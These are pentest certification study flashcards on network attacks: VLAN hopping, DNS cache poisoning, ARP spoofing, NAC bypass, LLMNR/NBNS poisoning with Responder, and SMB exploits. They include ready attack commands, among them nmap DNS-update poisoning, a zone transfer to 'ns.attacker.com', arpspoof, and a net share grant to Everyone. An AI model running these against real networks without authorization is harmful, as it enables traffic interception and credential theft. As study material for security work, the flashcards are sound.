Chapter 07: Exploiting Network Vulnerabilities Flashcards
Packet Storm
Includes news as well as exploit information and code
DION NOTES
* Contains news articles, advisories, whitepapers, tools, and exploits that can be reviewed and used in pentests
VLAN Hopping
VLAN Hopping is when you access a VLAN other than the one you’re currently on
Double Tagging
* Used on 802.1Q trunked interfaces
* Insert the native VLAN’s tag as the first tag, and the target VLAN’s tag as the second tag
* This causes the packet to be passed on by switches on its native VLAN, with the next switch on its trip reading the second tag
* Can only be used when switches are configured to allow native VLANs—many orgs will mitigate this to prevent abuse
Switch Spoofing
* Makes the attacking host act like a trunking switch
* Becaues the host appears to be a switch that allows trunks, it can view traffic sent to other VLANs
* Requires that local network devices be configured to allow the attacking host to negotiate trucks, with an interface set to dynamic desirable, dynamic auto, or trunk mode
* If you get control of network devices or discover a misconfigured or poorly maintained and managed network, switch spoofing can provide additional visibility into VLANs that might be hidden
DION NOTES
If you gain access to a workstation located in one VLAN, you’re going to have to break out of that VLAN to gain access to other sensitive areas of the nework
* VLAN Hopping is a technique exploiting a misconfiguration to direct traffic to a different VLAN without proper authorization
Double Tagging
* Attacker tries to reach a different VLAN using the vulnerabilities in the trunk port configuration
* Inner tag contains the true destination set by the attacker
* Outer tag contains the native VLAN, which is the one VLAN that travels across the trunk port without a VLAN tag by itself
* When the switch receives the frame, it removes the outer tag and forward the frame to the VLAN of the second, inner tag
* The destination is not going to double tag the data that gets sent back, so it’s a one-way trip
* EX: You can send an exploit into the VLAN with double tagging that establishes a beacon calling out to C2 server—now you’re outide the LAN and you can establish two-wan comms
* EX: When you don’t need a response back with DoS or stress test
Switch Spoofing
* Attacker tries to conduct a Dynamic Trunking Protocol (DTP) negotiation
CAM Overload
* Overloaded CAM tables result to switches failing open and acting like a hub, which repeates every frame it receives on every port
* Pentesters can flood the CAM table with MAC addresses which causes it to fail open
* Then you can sniff traffic on a port you have set up a listener on and read traffic destined for other VLANs
DNS Spoofing / DNS Cache Poisoning
A poisoned DNS entry will point traffic to the wrong IP address and allow attackers to redirect traffic to a system of their choice
Most DNS poisoning relies on vulnerabilities in DNS software, but improperly configured or secured DNS servers can allow attackers to present DNS information without proper validation
Pentesters can modify the local hosts file on compromised systems to resolve hostnames to specified IP addresses
Can also modify the actual DNS server for a network
DION NOTES
DNS Cache Poisoning
* Attacker attempts to change the IP of a domain name that’s stored in the DNS cache of a given DNS server
* If they can do this, any client who requests the site in the future is going to be redirected to a website controlled by the attacker, which allows further exploitation
* There are multiple places DNS caches exist though, including on the client itself, default gateway or router, local DNS server, ISP DNS server, and all upstream DNS servers to the root DNS nameserver
To Conduct DNS Cache Poisoning
* First, check if the target’s server uses recursion with nmap
* nmap -sU -p 53 –script=dns-recursion [IP]
* If recursion is enabled, you can attempt a dynamic DNS update without authentication with nmap
* nmap -sU -p 53 –script=dns-update –script-args=dns-update.hostname=[domain],dns-update.ip=[IP] target
* This command attempts to give the upate with the new address you want to associate with a particular IP
Many Ways to Conduct DNS Poisoning
* Poisoning workstation’s or server’s DNS cache
* Hijacking local DNS server
* Performing unauthorized zone transfer to an unpatched DNS server where you can then change the IP address of a given web server’s A record
DNSSEC
DNS Security Extensions
* Uses digital signatures based on public-key cryptography to ensure DNS data is digitally signed by the owner
* It prevents spoofing of DNS records and makes poisoning difficult—used to protect the validity and authority of the DNS servers in an organization
* The zone owner and the resolvers need to configure their DNS servers to support DNSSEC
DNS Zone Transfer
A method of replicating DNS database entries across a set of DNS servers, and it can be used for information gathering and exploitation
Windows Use
* nslookup in interactive mode to attempt zone transfer
* nslookup
* set type=any
* ls-d [domain]
* This command says that you want all the records for any kind of DNS information you have on the server, and I want you to transfer them for this domain name to my system
* If the DNS server is misconfigured, you’re going to be able to download all of their information from their DNS server to your local machine
Linux / Mac Use
* dig axfr ns.target.com ns.attacker.com
* AXFR = authoritative transfer
* Uses the dig tool to conduct a zone transfer from the nameserver of the target to the nameserver that I control as the attacker
* This command copies all of the DNS entries over to the attacker’s nameserver
* You can then go through them, manipulate them, and use the information as needed
* Get IPs for your servers, subdomains, etc (aka DNS Harvesting)
nmap use
* NSE dns-zone-transfer.domain
ARP Spoofing
Attacker sends falsified ARP messages on a local network, providing an incorrect MAC address to IP pairing for the deceived system or systems
The information is written to the targets machine’s ARP cache, and the attacker can then intercept or capture and forward traffic, hijack sessions, or cause additional traffic to hit a target system potentiall causing DoS
DION NOTES
ARP Spoofing
* The sending of falsified ARP messages over a LAN to get the ARP caches to dynamically update with new information
* Remember, ARP creates a binding between IP and MAC inside the LAN using layer 2 OSI / data link
* ARP spoofing is used as a precursor to other attacks, like on-path
ARP Poisoning
* Attack that exploits the IP address to MAC resolution in a network to steal, modify, or redirect frames within the network
* One way to do this is with ARP spoofing
* VLAN segmentation and DHCP snooping are the defense against ARP spoofs and poison, to ensure that IPs aren’t being stolen or taken over by an attacker
To Conduct ARP Poisoning and Redirect Traffic from Victim
1. Identify the MAC address and IP using wireshark or nmap -PR -sn [target] (conducts an ARP ping and disables port scan)
2. Use Metasploit (auxiliary/spoof/arp/arp_poisoning) or arpspoof -i [interface] -t [IP] to conduct ARP poisoning
MAC Address Spoofing
Can be used to bypass NAC, captive portals, and security filters that rely on a system’s MAC to identify it
Can also be used as MITM and other attacks that rely on systems thinking they’re sending traffic to a legitimate host
MAC addresses can be manually set from the “Advanced” tab for your network adapter
Replay Attacks
Form of MITM that focuses on capturing and then resending data
Common uses for replay attacks include masquerading to allow an attacker to present credentials to a service or system after capturing them during an authentication process
One of the most common replay attacks used by pentesters is the NTLM pass the hash attack
* Once NTLM hashes are acquired, pentesters identify systems that don’t require SMB signing (which prevents pass the hash)
* With a list of targets, Responder or other tools can intercept authentication attempts
* Then, NTLM relay tool can be leveraged to drop Empire or another similar tool onto the target
Relay Attacks
The on-path system is used only to relay attacks without modifying them rather than modifying any traffic
These aren’t limited to traditional IP-based network traffic—EX: you can query an RFID card or other device required to provide authentication and relay the response to a device or system the card isn’t actually near
NAC Bypass
NAC detection process typically involves one of the following methods:
* A software client that talks to a NAC server when connected
* DHCP proxy that listens for traffic like DHCP requests
* Broadcast listener that looks for broadcast traffic like ARP queries or a more general purpose sniffer that looks at other IP packets
* SNMP-trap-based approach that queries switches to determine when a new MAC address shows up on one of their connected ports
Pentesters need to determine which detection method the NAC is using in order to know how to bypass
EX: Systems that don’t require client software and rely on MAC addresses of a device can sometimes be bypassed with a cloned MAC on the same port than an existing system was connected to
DION NOTES
NAC is used to keep unauthorized users or devies from accessing a private network
* When a device is attempting to connect to the network, it’s placed in a virtual holding area while it’s being scanned to check for AV definitions, security patches, etc
* If it passes, it can enter and access resources
* If it fails, it’s placed into digital quarantine before it meets requirements of NAC
Persistent Agents
* A type of software installed on the device requesting access to the network
* Works well in a corporate environment because the org owns all of the devices and controls the software baseline
Non-Persistent Agent
* Requires the users to connect to the network and log in to a web-based captive portal to download an agent that scans their devices for compliance
Agentless NAC / Volatile Agent
* Installs the scanning engine on the DC instead of the endpoint device
* Works well with BYOD policy or doesn’t have access to the endpoint devices to install agent-based NAC
* They run in the volatine RAM
How to Bypass
* Exploit an authorized host and use it as a pivot point to send traffic through that device
* Make your device look like someting else like a VoIP handset, printers, etc that isn’t restricted by NAC—most are segmented into their own VLAN though, so you have to VLAN hop out of
DoS Attacks and Stress Testing
Most pentests will prohibit intentional DoS attacks in the RoE, particularly against production environments
But some will allow it, or even require it if the client wants to understand their ability to weather them
There are three main types of DoS:
1. Application layer DoS that crash a service or entire server
2. Protocol-based DoS that take advantage of a flaw in a protocol, like SYN floods
3. Traffic volume-based DoS that overwhelm a target by sending more traffic than it can handle
NOTE: Applicaiton layer DoS are likely to happen accidentally during a pentest while exploiting vulnerabilities in services or apps—address unintenional DoS in the RoE and have clear comms plans for what to do if they happen
If alowed in the scope, pentesters have a number of tools to help:
* Commercial load and stress testing services (stressers)
* Hping
* Metasploit (obviously)
* HTTP Unbearable Load King (HULK)
* Low Orbit Ion Cannon (LOIC)
* High Orbit Ion Cannon (HOIC)
* SlowLoris
DION NOTES
Stress testing is a software testing method that evaluates how software performs under extreme load
* Typically, you won’t do this in a pentest unless explicitly asked
* You can stress processor, memory, network, or storage load on a system
Exploit Chaining
Using multiple exploits to achieve your goal
EX: Exploit a vulnerable service –> use a privilege escalation attack from a locak service account –> obtain credentails to access other systems for more exploits, etc
DION NOTES
* Chained exploits can be run simultaneously or sequentially
* This is where we combine things to create a holistic attack, and they don’t always have to be technical
NetBIOS
Commonly used for file sharing, but the protocol has many other services that rely on it as well
One of the most commonly targeted services in a Windows network
Port 139
NetBIOS Name Services and Attacks
When Windows systems need to resolve the IP address for a hostname, they use three lookup methods in the following order:
1. The Local host file found at C:\Windows\System32\drivers\etc\hosts
2. DNS, first via local cache and then via the DNS server
3. The NetBIOS name service (NBNS), first via Link Local Multicast Name Resolution (LLMNR) queries and then via NetBIOS Name Service (NBT-NS) queries
Most local networks don’t have entries in DNS for local systems, particularly other workstations and network devices
Domain controllers or other important elements of infrastructure may resolve via DNS, but many Windows services will end up falling through to the NetBIOS name service (NBT-NS)
Targeting NetBIOS name service can be surprisingly effective, here’s what it looks like:
* Windows sends broadcast queries to the local subnet’s broadcast address via LLMNR and NetBIOS –> Provides an oppty for you to respond with a spoofed response, redirecting traffic to a host of your choice
As a stand-alone exploit it’s not particularly effective, but SMB spoofing using tools like Responder or Metasploit, and then pairing with capturing tools like “capture_smb” in msf for authentication hashes, can be powerful when dealing with networks that support less secure hashing methods
Once you have the hashes you can reuse them for pass-the-hash attacks
* NOTE: This will require a bit more work since hashes sent via SMB are salted using a challenge to prevent their reuse
* Metasploit and other tools that are designed to capture SMB hashes can defeat this protection by sending a static challenge and allowing the use of rainbow tables to crack the password
DION NOTES
Link-Local Multicast Name Resolution (LLMNR)
* Based on the DNS packet formatting and allows both IPv4/6 hosts to perform name resolution on the host if they are on the same local link
* Both hosts need to be on same internal network to use the LLMNR
* If no DNS server, Windows can use LLMNR to determine names and IPs of other servers and resources on the network
* This will not work on Linux—Linux relies on ZeroConf using the SystemD (system daemon)
NetBIOS Name Service (NBNS or NBT-NS)
* Part of the NetBIOS-over-TCP protocol suite that’s used as a type of name resolution inside the internal network to translate internal names to IPs
* Uses 16-character ASCII name
* Linux uses this as well
* EX: //fileserver or //ShareDrive or //WillsPC
* Windows will defalt to LLMNR, and then fallback to NBNS
To Exploit
Pentesters can use Responder
* CLI tool that’s used to poison NBNS, LLMNR, and mDNS name resolution requests
* Post-exploitation tool because you have to break into the network first
* Responder will listen for any time a system calls out for a certain machine
* Then, it poisons the name resolution call by sending back incorrect information
* EX: A machine wants to locate the file server, but attacker machine will respond with IP to different server controlled by attacker
* Can perform other attacks and exploits after this, but you have to prevent the real machine from responding to the initial request
Page 257-261 in depth diagrams
NetBIOS Ports
- 135, TCP: MS-RCP endpoint matter (epmap)
- 137, UDP: NetBIOS name service
- 138, UDP: NetBIOS datagram service
- 139, TCP: NetBIOS session service
- 445, TCP: SMB
Using Responder with NetBIOS
When exploiting NetBIOS and LLMNR responses, Responder is powerful
It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, LLMNR, and multicast DNS queries pretending to be the system that the query is intended for
Once Responder sees an authentication attempt, it will capture the hash automatically, allowing Responder to continue running in the background as you attempt other exploits or conduct further pentest work
Once you have captured credentials, you can use Responder to relay NTLM authentication to a target—if the attack is successful you can execute code
Windows net Commands
Exploring Windows domains is easier with net commands:
* net view /domain: Lists the hosts in the current domain—can also use /domain:[domain name] to search a domain that the system has access to other than the current domain
* net user /domain: Lists the users in the domain
* net accounts /domain: Shows the domain password policy
* net group /domain: Lists groups on the domain
* net group “Domain Admins” /domain: Adding a group name like “Domain Admins” to the net group command lists users in the group
* net share: Show current SMB shares
* net session: Reviews SMB session—using the find command with this can search for active sessions
* net share [name of share] c:\directory\of\your\choice / GRANT:Everyone,Full: Grants access to a folder on the system for any user with full rights—easy to change by identifying specific users or permissions levels
SMB Exploits
Server Message Block
The SMB implementation in Windows is another popular target for pentesters
Its vulnerabilities mean that unpatched systems can be exploited with relative ease, which include critical RCE vulnerabilities in the Windows SMB server discovered in 2017 (MS17-010—EternalBlue)
